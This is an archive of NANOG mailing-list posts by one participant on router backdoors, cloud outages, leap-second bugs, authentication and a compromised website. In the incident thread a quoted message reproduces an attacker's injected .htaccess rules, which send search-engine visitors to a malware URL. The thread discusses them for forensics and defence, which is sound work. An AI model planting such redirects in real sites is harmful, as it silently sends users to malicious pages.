Re: NSA able to compromise Cisco, Juniper, Huawei switches

2013-12-30 Thread [AP] NANOG

Roland,

I did fail to mention the HUMINT (Human Intelligence) side of things,
thank you for bringing that up!

-- 

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel


On 12/30/13, 11:33 PM, Dobbins, Roland wrote:
> On Dec 31, 2013, at 11:06 AM, [AP] NANOG  wrote:
>
>> Then looking at things from the evil side though, if they owned the system 
>> which provides the signing then they could sign
>> virtually anything they wish.
> Or if they owned *people* with the right level of access to do so, or if 
> there were implementation bugs which could be utilized to bypass or obviate 
> the signing . . .
>
> None of the alleged capabilities described in the purported documents is 
> really standalone; they all rely upon other methods/mechanisms in order to 
> provide the required foundation to accomplish their stated goals.
>
>> I think we need to watch and listen/read over the coming weeks and months 
>> before we go assuming we have it figured out.
> This is the most pertinent and insightful comment made in this thread.
>
> ---
> Roland Dobbins  // <http://www.arbornetworks.com>
>
> Luck is the residue of opportunity and design.
>
>  -- John Milton
>
>
>




Re: NSA able to compromise Cisco, Juniper, Huawei switches

2013-12-30 Thread [AP] NANOG
Sabri,

As I was reading through all these replies, the one thing that kept
nagging at me was the requirement for signed binaries and microcode.
The same goes for many of the Cisco binaries: without direct
assistance, which is unclear at this point through the cloud of smoke,
so to speak, it would be difficult to load this code after
implementation or manufacturing.  Looking at things from the evil side,
though, if they owned the system which provides the signing then they
could sign virtually anything they wish.  This is similar to what
happened to Red Hat a number of years ago, when their repos were owned
and the compromised packages still passed verification because the
signing server was owned as well.
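To make the Red Hat analogy concrete, here is a minimal sketch of why signature checking collapses when the signing server itself is owned. The key name, image strings, and the use of HMAC in place of a real code-signing scheme are all illustrative assumptions, not any vendor's actual mechanism:

```python
import hmac
import hashlib

# Hypothetical signing key; on a real vendor's signing server this would
# be an asymmetric private key kept in an HSM.
SIGNING_KEY = b"vendor-secret"

def sign(image: bytes, key: bytes) -> str:
    """Produce a signature over a firmware image."""
    return hmac.new(key, image, hashlib.sha256).hexdigest()

def device_verifies(image: bytes, signature: str, key: bytes) -> bool:
    """What the device does before accepting an image."""
    return hmac.compare_digest(sign(image, key), signature)

legit = b"firmware v1.0"
backdoored = b"firmware v1.0 + implant"

# Normal case: only the signed image passes verification.
good_sig = sign(legit, SIGNING_KEY)
assert device_verifies(legit, good_sig, SIGNING_KEY)
assert not device_verifies(backdoored, good_sig, SIGNING_KEY)

# But if the attacker owns the signing infrastructure, they can sign
# anything they wish, and every device will happily accept it.
evil_sig = sign(backdoored, SIGNING_KEY)
assert device_verifies(backdoored, evil_sig, SIGNING_KEY)
```

The point is that signing only shifts trust onto the signing infrastructure; it does not eliminate it.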

I'm not saying this is or isn't the case, but I know from my experience
at an ISP running Juniper routers (M and J Series) coast to coast that,
with the number of eyes watching these devices, it would have to be
done at the firmware level not to be seen by the analysts.  That is not
out of reach either: roughly 5-7 years ago, Ethernet cards were owned
with a firmware hack, and all the traffic crossing the interface was
captured and reported back.  All the conversations surrounding that
topic were shut down quickly, and the conference talks about it dried
up as well; everyone I talked to was curious why discussion of such an
attack suddenly went silent and has yet to resurface...

I think we need to watch and listen/read over the coming weeks and
months before we go assuming we have it figured out.

Keep in mind the best way to cover up a covert mission is not to cover
it up in the first place.  Put it out there, then flood the channels
with false information until the real mission is so clouded with
misinformation that you can no longer see it, resulting in the perfect
execution of the op.

Just a few thoughts, sorry no answers...

-- 

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel


On 12/30/13, 10:38 PM, Sabri Berisha wrote:
> Hi Roland.
>
>> I don't know much about Juniper
>> gear, but it appears that the Juniper boxes listed are similar in nature,
>> albeit running FreeBSD underneath (correction welcome).
> With most Juniper gear, it is actually quite difficult to achieve 
> wire-tapping on a large scale using something as simple as a backdoor in the 
> BIOS.
>
> Assuming M/MX/T series, you are correct that the foundation of the 
> control-plane is a FreeBSD-based kernel. However, that control-plane talks to 
> a forwarding-plane (PFE). The PFE runs Juniper designed ASICs (which differ 
> per platform and sometimes per line-card). In general, transit-traffic 
> (traffic that enters the PFE and is not destined to the router itself), will 
> not be forwarded via the control-plane. This means that whatever the backdoor 
> is designed to do, simply can not touch the traffic. There are a few 
> exceptions, such as a carefully crafted backdoor capable of altering the 
> next-hop database (the PFEs forwarding table) and mirroring traffic. This 
> however, would mean that the network would already have to be compromised. 
> Another option would be to duplicate target traffic into a tunnel (GRE or 
> IPIP based for example), but that would certainly have a noticeable effect on 
> the performance, if it is possible to perform those operations at all on the 
> target chipset. 
>
> However, attempting any of the limited attacks that I can think of would 
> require expert-level knowledge of not just the overall architecture, but also 
> of the microcode that runs on the specific PFE that the attacker would 
> target, as well as the ability to partially rewrite that. Furthermore, to 
> embed such a sophisticated attack in a BIOS would seem impossible to me with 
> the first reason being the limited amount of storage available on the EEPROM 
> to store all that binary code. 
>
> An attack based on corrupted firmware loaded post-manufacturing would also be 
> difficult due to the signed binaries and microcode. Embedding such a backdoor 
> would be extremely difficult without Juniper's cooperation. And the 
> last time I looked at the code (I left Juniper a few months ago), I saw 
> nothing that would indicate a backdoor of any kind. 
>
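A quick back-of-envelope on the tunnel-mirroring option Sabri mentions: beyond the question of whether the chipset can do it at all, GRE-in-IPv4 encapsulation adds a fixed per-packet cost that is hard to hide on small packets. The header sizes below are standard; the sample packet sizes are just an illustrative traffic mix:

```python
IPV4_HDR = 20  # bytes, outer IPv4 header without options
GRE_HDR = 4    # bytes, minimal GRE header without optional fields

def gre_overhead_pct(packet_bytes: int) -> float:
    """Extra bytes GRE-in-IPv4 encapsulation adds, as a percentage."""
    return 100.0 * (IPV4_HDR + GRE_HDR) / packet_bytes

# Overhead per mirrored packet -- and remember mirroring also doubles
# the traffic volume for every flow being duplicated.
for size in (64, 512, 1500):
    print(f"{size:5d}B packet: +{gre_overhead_pct(size):.1f}% on the wire")
```

At 64-byte packets the encapsulation alone adds 37.5% on the wire, on top of the 100% increase from duplicating the traffic in the first place, which is why such mirroring would be noticeable.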





Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
I believe in my dictionary Chaos Gorilla translates into "Time To Go 
Home", with a rough definition of "Everything just crapped out - the 
world is ending"; but then again I may have that incorrect :-)


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 2:59 PM, Paul Graydon wrote:

On 07/02/2012 08:53 AM, Tony McCrory wrote:

On 2 July 2012 19:20, Cameron Byrne  wrote:


Make your chaos animal go after sites and regions instead of individual
VMs.

CB


 From a previous post mortem
http://techblog.netflix.com/2011_04_01_archive.html

"
Create More Failures
Currently, Netflix uses a service called "Chaos Monkey" to simulate
service failure. Basically, Chaos Monkey is a service that kills other
services. We run this service because we want engineering teams to be
used to a constant level of failure in the cloud. Services should
automatically recover without any manual intervention. We don't,
however, simulate what happens when an entire AZ goes down and
therefore we haven't engineered our systems to automatically deal with
those sorts of failures. Internally we are having discussions about
doing that and people are already starting to call this service "Chaos
Gorilla".
"

It would seem the Gorilla hasn't quite matured.

Tony
From conversations with Adrian Cockcroft this weekend it wasn't the 
result of Chaos Gorilla or Chaos Monkey failing to prepare them 
adequately.  All their automated stuff worked perfectly, the 
infrastructure tried to self heal.  The problem was that yet again 
Amazon's back-plane / control-plane was unable to cope with the 
requests.  Netflix uses Amazon's ELB to balance the traffic and no 
back-plane meant they were unable to reconfigure it to route around 
the problem.


Paul
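For anyone who hasn't seen it in action, the Chaos Monkey idea quoted above boils down to something very small. This is a hedged sketch of the concept only, not Netflix's implementation; the instance names and the kill callback are placeholders:

```python
import random

def pick_victim(instances, rng=random):
    """Randomly choose one running instance to kill."""
    return rng.choice(sorted(instances))  # sorted() for deterministic ordering

def chaos_round(instances, kill):
    """One round of chaos: pick a victim and kill it.

    In production the `kill` callback would terminate a VM or container;
    here it is whatever the caller supplies.
    """
    victim = pick_victim(instances)
    kill(victim)
    return victim

# Demo: "kill" just records the victim.
killed = []
instances = {"api-1", "api-2", "edge-1"}
victim = chaos_round(instances, killed.append)
assert victim in instances and killed == [victim]
```

The whole value is in what happens next: whether the surviving services recover without manual intervention. Chaos Gorilla is the same loop with the victim being an entire availability zone instead of a single instance.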







Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
This is an excellent example of how tests "should" be run; unfortunately, 
far too many places don't do this...


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 12:09 PM, Leo Bicknell wrote:

In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood 
wrote:

from the perspective of people watching B-rate movies:  this was a
failure to implement and test a reliable system for streaming those
movies in the face of a power outage at one facility.

I want to emphasize _and test_.

Work on an infrastructure which is redundant and designed to provide
"100% uptime" (which is impossible, but that's another story) means
that there should be confidence in a failure being automatically
worked around, detected, and reported.

I used to work with a guy who had a simple test for these things,
and if I was a VP at Amazon, Netflix, or any other large company I
would do the same.  About once a month he would walk out on the
floor of the data center and break something.  Pull out an ethernet.
Unplug a server.  Flip a breaker.

Then he would wait, to see how long before a technician came to fix
it.

If these activities were service-impacting to customers, the engineering
or implementation was faulty, and remediation was performed.  Assuming
things acted as designed and the customers saw no faults, the team was
graded on how quickly they detected and corrected the outage.

I've seen too many companies whose "test" is planned months in advance,
and who exclude the parts they think aren't up to scratch from the test.
Then an event occurs, and they fail, and take down customers.

TL;DR If you're not confident your operation could withstand someone
walking into your data center and randomly doing something, you are
NOT redundant.
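The monthly drill Leo describes reduces to a simple harness: break something, then measure how long the monitoring takes to notice. This is a toy sketch of that grading loop; the `break_component` and `monitor` callables are stand-ins for pulling a cable and for a real alerting pipeline:

```python
import time

def run_drill(break_component, monitor, poll=0.01, timeout=5.0):
    """Break something, then return seconds until monitoring notices.

    Returns None if the failure is never detected within `timeout`,
    which means the drill (and the monitoring) failed.
    """
    break_component()
    start = time.monotonic()
    while time.monotonic() - start < timeout:
        if monitor():  # did alerting notice the failure?
            return time.monotonic() - start
        time.sleep(poll)
    return None

# Demo: a trivial "service" whose health flag we flip.
state = {"up": True}
detect_time = run_drill(
    break_component=lambda: state.update(up=False),
    monitor=lambda: not state["up"],
)
assert detect_time is not None and detect_time < 1.0
```

In a real drill the interesting number is not whether detection happens (it must), but the trend of the detection time month over month.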





Re: F-ckin Leap Seconds, how do they work?

2012-07-02 Thread AP NANOG

Do you happen to know all the kernels and versions affected by this?

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/1/12 12:44 PM, George Bonser wrote:



-Original Message-
From: Roy
Sent: Saturday, June 30, 2012 10:03 PM
To: nanog@nanog.org
Subject: Re: F-ckin Leap Seconds, how do they work?


Talk about people not testing things, leap seconds have been around
since 1961.  There have been nine leap seconds in the last twenty
years.  Any system that can't handle a leap second is seriously flawed.


Roy, this was a problem in only certain kernel versions.  Unfortunately, the 
range of versions affected is pretty widely deployed right now.  Earlier and 
later versions did not have the problem.
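Since the question was which kernels are affected, here is a rough sketch of checking a running kernel release string against a suspect range. The range used below (2.6.26 inclusive to 3.4 exclusive) is an illustrative assumption for demonstration, not an authoritative list of leap-second-buggy kernels; check your distribution's advisories for the real one:

```python
import re

# ASSUMED affected range -- illustrative only, verify against vendor advisories.
AFFECTED_MIN = (2, 6, 26)   # inclusive
AFFECTED_MAX = (3, 4, 0)    # exclusive

def kernel_tuple(release: str):
    """Parse '3.2.0-26-generic' -> (3, 2, 0), ignoring distro suffixes."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    return tuple(int(g or 0) for g in m.groups())

def possibly_affected(release: str) -> bool:
    return AFFECTED_MIN <= kernel_tuple(release) < AFFECTED_MAX

print(possibly_affected("3.2.0-26-generic"))  # True under this assumed range
print(possibly_affected("3.5.1"))             # False
```

On a live box you would feed it `platform.release()` (the output of `uname -r`).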








Re: FYI Netflix is down

2012-07-02 Thread AP NANOG
While I was working for a wireless telecom company, our primary 
datacenter was knocked off the power grid due to weather.  The 
generators kicked on and everything was fine, until one generator was 
struck by lightning and that same strike fried the control panel on the 
second one.  With no control panel on the second generator, we had no 
means of monitoring its temperature, fuel, input voltage (when it came 
back), output voltage, or surge protection, or of telling whether the 
generator had spiked to full voltage due to a regulator failure.  
Needless to say, we had to shut the second generator down for safety 
reasons.


While in the military I saw many generators struck by lightning as well.

I'm not saying Amazon was not at fault here, but I can see how this is 
possible, and it happens more frequently than one might think.


I hate to play devil's advocate here, but you as the customer should 
always have backups to your backups, and practice these fail-overs on a 
regular basis.  Otherwise the fault is yours, no one else's...


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 11:01 AM, Dan Golding wrote:

-Original Message-
From: Todd Underwood [mailto:toddun...@gmail.com]

scott,


This was not a cascading failure.  It was a simple power outage

Actually, it was a very complex power outage. I'm going to assume that what 
happened this weekend was similar to the event that happened at the same 
facility approximately two weeks ago (it's immaterial - the details are probably 
different, but it illustrates the complexity of a data center failure).

Utility Power Failed
First Backup Generator Failed (shut down due to a faulty fan)
Second Backup Generator Failed (breaker coordination problem resulting in 
faulty trip of a breaker)

In this case, it was clearly a cascading failure, although only limited in 
scope. The failure in this case, also clearly involved people. There was one 
material failure (the fan), but the system should have been resilient enough to 
deal with it. The system should also have been resilient enough to deal with 
the breaker coordination issue (which should not have occurred), but was not. 
Data centers are not commodities. There is a way to engineer these facilities 
to be much more resilient. Not everyone's business model supports it.

- Dan



Cascading failures involve interdependencies among components.


Not always.  Cascading failures can also occur when there is zero
dependency between components.  The simplest form of this is where one
environment fails over to another, but the target environment is not
capable of handling the additional load and then "fails" itself as a
result (in some form or other, but frequently different to the mode
of the original failure).

indeed.  and that is an interdependency among components.  in
particular, it is a capacity interdependency.
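That capacity interdependency is easy to put in numbers. A toy model, with illustrative load and capacity figures: when site A fails, its load lands on site B, and if B cannot absorb the sum, the nominally independent component fails too:

```python
def surviving_site_ok(load_a: float, load_b: float, capacity_b: float) -> bool:
    """Site A fails over to site B; can B carry both loads?"""
    return load_a + load_b <= capacity_b

# Two sites each running at 70% of a 100-unit capacity: the failover
# itself sinks the survivor -- a cascade with no shared hardware at all.
assert not surviving_site_ok(load_a=70, load_b=70, capacity_b=100)

# Keep each site under 50% and the same failover succeeds.
assert surviving_site_ok(load_a=45, load_b=45, capacity_b=100)
```

This is why "we have a second site" is not redundancy unless each site is provisioned (and tested) to carry the combined load.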


Whilst the Amazon outage might have been a "simple" power outage, it's
likely that at least some of the website outages caused were a
combination of not just the direct Amazon outage, but also the flow-on
effect of their redundancy attempting (but failing) to kick in -
potentially making the problem worse than just the Amazon outage caused.

i think you over-estimate these websites.  most of them simply have no
redundancy (and obviously have no tested, effective redundancy) and
were simply hoping that amazon didn't really go down that much.

hope is not the best strategy, as it turns out.

i suspect that randy is right though:  many of these businesses do not
promise perfect uptime and can survive these kinds of failures with
little loss to business or reputation.  twitter branded its early
failures with a whale that not only didn't hurt it but helped endear the
service to millions.  when your service fits these criteria, why would
you bother doing the complicated systems and application engineering
necessary to actually have functional redundancy?

it simply isn't worth it.

t


   Scott




Re: No DNS poisoning at Google (in case of trouble, blame the DNS)

2012-06-27 Thread AP NANOG

On 6/27/12 12:51 PM, Matthew Black wrote:

Ask and ye shall receive:

# more .htaccess (backup copy)

#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]

#/c3284d#
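For readers less familiar with mod_rewrite: the injected rules above redirect a visitor only when the Referer header matches one of the listed search engines or social sites; direct visits (e.g. the site owner typing the URL) see the normal page, which is exactly why this class of compromise goes unnoticed. A small Python simulation of that conditional behavior, using a handful of referers to stand in for the full list:

```python
import re

# Abbreviated stand-in for the enormous alternation in the .htaccess above.
BAD_REFERER = re.compile(r"^.*(google|bing|yahoo|facebook|twitter)\.(.*)")

MALWARE_URL = "http://www.couchtarts.com/media.php"  # from the RewriteRule

def handle_request(referer: str) -> str:
    """Mimic the injected rewrite rules for a single request."""
    if referer and BAD_REFERER.match(referer):
        return f"301 -> {MALWARE_URL}"   # search-engine visitors get redirected
    return "200 normal page"             # direct visits look perfectly healthy

print(handle_request("http://www.google.com/search?q=csulb"))
print(handle_request(""))  # direct visit: the owner sees nothing wrong
```

Testing your own site with a forged Referer header (e.g. `curl -e http://www.google.com/ http://example.org/`) is a quick way to check for this pattern.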

   # # #

matthew black
information technology services
california state university, long beach



-Original Message-
From: Jason Hellenthal [mailto:jhellent...@dataix.net]
Sent: Wednesday, June 27, 2012 6:26 AM
To: Arturo Servin
Cc: nanog@nanog.org
Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)


What would be nice is to see the contents of the htaccess file
(obviously with sensitive information excluded)

On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:

It was not DNS issue, but it was a clear case on how community-support helped.

Some of us may even learn some new tricks. :)

Regards,
as

Sent from mobile device. Excuse brevity and typos.


On 27 Jun 2012, at 05:07, Daniel Rohan  wrote:


On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer wrote:

What made you think it can be a DNS cache poisoning (a very rare

event, despite what the media say) when there are many much more
realistic possibilities (specially for a Web site written in
PHP)?

What was the evidence pointing to a DNS problem?


It seems likely that he made a mistake in his analysis of the evidence.
Something that could happen to anyone when operating outside of a comfort
zone or having a bad day. Go easy.

-DR

G' did they miss anyone in that list of referers :-)

Thanks for posting!

--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel




Re: DNS poisoning at Google?

2012-06-27 Thread AP NANOG
This may not help Matt now, but I just came across this today and 
believe it may help others who have to deal with incidents:


http://cert.societegenerale.com/en/publications.html --> "IRM (Incident 
Response Methodologies)"


If you changed the file contents before noting the created date, 
modified date, etc., then look to your backups.  Those dates will 
help you track down the log entries and finally lead you to the 
root cause.


Also, if possible, please post the culprit code that caused this, 
redacting the sensitive data of course :-)
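The "note the timestamps first" step is worth making mechanical, since a careless `rm` or edit destroys exactly the evidence you need for log correlation. A minimal sketch (the temp file below is just a stand-in for the suspect .htaccess):

```python
import os
import tempfile
import datetime

def snapshot_times(path: str) -> dict:
    """Record a file's access/modify/change times before touching it."""
    st = os.stat(path)
    iso = lambda t: datetime.datetime.fromtimestamp(t).isoformat(" ")
    return {
        "atime": iso(st.st_atime),
        "mtime": iso(st.st_mtime),  # when the attacker last wrote the file
        "ctime": iso(st.st_ctime),  # metadata change time (platform-dependent)
    }

# Demo on a temp file standing in for the suspect .htaccess.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"#c3284d# ...")
times = snapshot_times(f.name)
os.unlink(f.name)  # remove only AFTER recording the timestamps
print(sorted(times))
```

The mtime then gives you the window to search in your web server and FTP/SSH logs.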


--

Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 6/27/12 7:50 AM, TR Shaw wrote:

On Jun 27, 2012, at 3:36 AM, Michael J Wise wrote:


On Jun 27, 2012, at 12:06 AM, Matthew Black wrote:


We found the aberrant .htaccess file and have removed it. What a mess!


Trusting you carefully noted the date/time stamp before removing it, as that's 
an important bit of forensics.

And don't forget there is a trail on that file in your backups.

Tom







Re: How to fix authentication (was LinkedIn)

2012-06-25 Thread AP NANOG

Kyle,

I may be mistaken here, but I don't believe anyone is truly laughing the 
matter off.


There may have been some remarks about second or third parties, but the 
fact remains that these are the areas where the current concerns still lie.


--

Robert Miller
(arch3angel)

On 6/24/12 1:02 AM, Kyle Creyts wrote:

I would suggest that multiple models be pursued (since each appears to have
a champion) and that the market/drafting process will resolve the issue of
which is better (which is okay by me:  widespread adoption of any of the
proposed models would advance the state of the norm; progress beats the
snot out of stagnation in my book)

My earlier replies were reprehensible. This is not a thread that should
just be laughed off. Real progress may be occurring here, and at the least,
good knowledge and discussion is accumulating in a way which may serve as a
resource for the curious or concerned.
On Jun 22, 2012 7:25 AM, "Leo Bicknell"  wrote:


In a message written on Thu, Jun 21, 2012 at 04:48:47PM -1000, Randy Bush
wrote:

there are no trustable third parties

With a lot of transactions the second party isn't trustable, and
sometimes the first party isn't as well. :)

In a message written on Thu, Jun 21, 2012 at 10:53:18PM -0400, Christopher
Morrow wrote:

note that yubico has models of auth that include:
   1) using a third party
   2) making your own party
   3) HOTP on token
   4) NFC

they are a good company, trying to do the right thing(s)... They also
don't necessarily want you to be stuck in the 'get your answer from
another'

Requirements of hardware or a third party are fine for the corporate
world, or sites that make enough money or have enough risk to invest
in security, like a bank.

Requiring hardware for a site like Facebook or Twitter is right
out.  Does not scale, can't ship to the guy in Pakistan or McMurdo
who wants to sign up.  Trusting a third party becomes too expensive,
and too big of a business risk.

There are levels of security here.  I don't expect Facebook to take
the same security steps as my bank to move my money around.  One
size does not fit all.  Making it so a hacker can't get 10 million
login credentials at once is a quantum leap forward even if doing
so doesn't improve security in any other way.

The perfect is the enemy of the good.

--
   Leo Bicknell - bickn...@ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/





Re: LinkedIn password database compromised

2012-06-22 Thread AP NANOG
Still playing devil's advocate here, but does this still not leave the 
human factor of "implementation" unresolved?


--

- Robert Miller
(arch3angel)

On 6/22/12 7:43 AM, Robert Bonomi wrote:

Rich Kulawiec  wrote:

On Wed, Jun 20, 2012 at 12:43:44PM -0700, Leo Bicknell wrote:

(on the use of public/private keys)


The leaks stop immediately.  There's almost no value in a database of
public keys, heck if you want one go download a PGP keyring now.

It's a nice thought, but it won't work.   There are two large-scale
security problems which prevent it from working:

1. Fully-compromised/hijacked/botted/zombied systems.  Pick your term,
but any estimate of this population under 100M should be laughed out
of the room.  Plausible estimates are now in the 200M to 300M range.
Any private key present on any of those is accessible to The Bad Guys
whenever they can trouble themselves to grab it.  (Just as they're
already, quite obviously, grabbing passwords en masse.)

The proverbial 'so what' applies?

IF the end-user system is compromised, it *doesn't*matter* what kind of
security is used,  THAT USER is compromised.

However, there is a _MASSIVE_ difference with respect to a 'server-side'
compromise.  One break-in, on *one* machine, can expose tens of millions,
(if not hundreds of millions) of user credentials.


2. Pre-compromised-at-the-factory smartphones and similar.  There's
no reason why these can't be preloaded with spyware similar to CarrierIQ
and directed to upload all newly-created private keys to a central
collection point.

Problem #1 has been extant for ten years and no (meaningful) progress
whatsoever has been made on solving it.

'male bovine excrement' applies to this strawman argument.

Leo made no claim of describing a FUSSP (final ultimate solution to stolen
passwords).  What he did describe was a methodology that could be fairly
easily implemented in the real world, =and= which effectively eliminates
the risk of _server-side_ compromise of a master 'password-equivalent' list.

Leo's proposal _does_ effectively address the risk of server-side compromise.
If implemented, it would effectively eliminate "more than half" of the




Re: Automatic attack alert to ISPs

2012-06-22 Thread AP NANOG

+1 - Took the letters right out from under my fingers :-)

--

- Robert Miller
(arch3angel)

On 6/22/12 4:44 AM, Barry Greene wrote:

Shadowserver.org has a public benefit notification service.

Sent from my iPad

On Jun 22, 2012, at 2:46 PM, Yang Xiang  
wrote:


Argus can alert prefix hijacking, in realtime.
http://tli.tl/argus
Hope to be useful to you.

BR.

在 2012年6月22日星期五,Ganbold Tsagaankhuu 写道:


Hi,

Is there any well known free services or scripts that sends automatic
attack alerts based on some logs to corresponding ISPs (based on src
address)?
I have seen dshield.org and mynetwatchman, but I don't know yet how
good they are.
If somebody has recommendations in this regard please let me know.

thanks in advance,

Ganbold



--
_
Yang Xiang. Ph.D candidate. Tsinghua University
Argus: argus.csnet1.cs.tsinghua.edu.cn




Re: How to fix authentication (was LinkedIn)

2012-06-22 Thread AP NANOG
I used the example I did based on YubiKey, I own one and use it on a 
regular basis.  The real issue I am trying to make is the fact that even 
in the scenario I placed forward it still requires trust.  Trust of a 
person or trust of a company.  This reminds me of a quote:


Only two things are infinite, the universe and 
human stupidity, and I'm not sure about the former.

- Albert Einstein

By no means am I saying any of us, or the majority of the world, is 
stupid or uneducated.  However, the weak link is the inherent nature of 
trust itself: relying on some other party.  It only takes a single 
person having a bad day, or just wanting to slack off for a day, to 
create a vulnerability in a password, key, encryption, or 
authentication process that hundreds if not thousands of people worked 
so hard to build.


While I used YubiKey as my original example, and use one on a regular 
basis, it still has its downfalls.  It cannot be used with ActiveSync, 
so ultimately you cannot use it for your Active Directory login 
because of a small thing called Exchange.  There have been other areas 
where YubiKey has failed, not by its own design, but by the design of 
the application itself.


How can any of our solutions over come the human factor?

--

- Robert Miller
(arch3angel)

On 6/21/12 10:53 PM, Christopher Morrow wrote:

On Thu, Jun 21, 2012 at 10:48 PM, Randy Bush  wrote:

That's basically the Yubikey. It uses a shared key, but since you're
relying on a trusted third party anyway

there are no trustable third parties

note that yubico has models of auth that include:
   1) using a third party
   2) making your own party
   3) HOTP on token
   4) NFC

they are a good company, trying to do the right thing(s)... They also
don't necessarily want you to be stuck in the 'get your answer from
another'

-chris




Re: How to fix authentication (was LinkedIn)

2012-06-21 Thread AP NANOG
I still believe that the final solution should be some sort of two 
factor, something you know (i.e. a passphrase) and something you have 
(i.e. key / token / something which has been verified).


Until recently RSA was a good platform, but it was not very effective 
for smartphone use.


If the two-factor methodology being deployed has no changing component, 
then man-in-the-middle attacks will still work, as will compromised 
client systems and even compromised servers.


What if, and I am brainstorming here, there was a hardware device which 
plugged in via USB?  It would be programmed (i.e., verified) in person, 
such as at a key-signing party.  The serial number of the hardware 
device is all that is stored in the "verified" database, along with a 
generic email created at that time under the verifying group's domain.  
For example, if your serial number is 12345, the email would be 
generated as 12...@foo.com.  The device is hardware-encrypted and 
stores your password (private key) with one-way encryption.  When you 
go to a website, it can ask whether you are verified by foo.com.  The 
user selects yes, and the website pulls the public key at that time.  
It then asks you for your PIN, password, pass-phrase, whatever, and the 
user clicks an eye-candy button in the browser which looks for the USB 
device with the serial number from the database.  Once found, it starts 
a secure tunnel, such as a VPN (it could be anything; I am just using 
it as a methodology), and no data is transmitted until the tunnel and 
DNSSEC have been established.  Once established, you can surf the site 
as normal, with all these connections and tunnels set up by the browser 
using two-factor authentication: what you know being the public key 
with verification from foo.com, which was also verified in person with 
the foo.com email, and what you have being the hardware token, again 
serial-number-verified and encrypted.  Combined, they give you access, 
and the browser does most of the work.


A couple of things I see as issues off the bat:

   Cost of the USB device
   Security controls over manufacturing
   In-person verification, which will require many locations and volunteers
   Still involves the human factor of error or misuse
   Education of users who are not techie
   Browser security
   Browser plugin & functionality
   Change time limit and process (i.e. must be regenerated after x months)
   Complete revocation of the token and notification to all websites
   using foo.com verification
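The "something you have" half of a scheme like the one sketched above is usually built on HOTP (RFC 4226), where the token and the verifier share a secret and a counter, and the token emits one-time codes. This is a straightforward RFC 4226 implementation, checked against the test vectors from the RFC's appendix:

```python
import hmac
import hashlib
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the counter, dynamically truncated."""
    msg = struct.pack(">Q", counter)                     # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation offset
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 4226 Appendix D test vectors, secret "12345678901234567890".
assert hotp(b"12345678901234567890", 0) == "755224"
assert hotp(b"12345678901234567890", 1) == "287082"
```

Note this still carries exactly the trust problem Robert raises: the shared secret has to live somewhere (the token, the manufacturer, the verifying server), and whoever holds it can mint valid codes.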

Again I am just throwing an idea out there to see what others think, 
maybe pieces of everyone's idea may result in an effective solution :-)


Along the lines of iCloud, or any cloud-based service: I am by no means 
a fan of cloud services in any shape or form.  The risks are WAY too 
great to be outweighed by the benefits.  If someone has a good argument 
for "secure" cloud services I am open to hearing it, but that's an 
entirely different email thread :-)


- Robert Miller
(arch3angel)


On 6/21/12 8:23 AM, Alexander Harrowell wrote:

On Thursday 21 Jun 2012 04:16:22 Aaron C. de Bruyn wrote:

On Wed, Jun 20, 2012 at 4:26 PM, Jay Ashworth  wrote:

- Original Message -

From: "Leo Bicknell" 

Yes, but you're securing the account to the *client PC* there, not

to

the human being; making that Portable Enough for people who use and
borrow multiple machines is nontrivial.

Or a wizard in your browser/OS/whatever could prompt you to put in a
'special' USB key and write the identity data there, making it
portable.  Or like my ssh keys, I have one on my home computer, one on
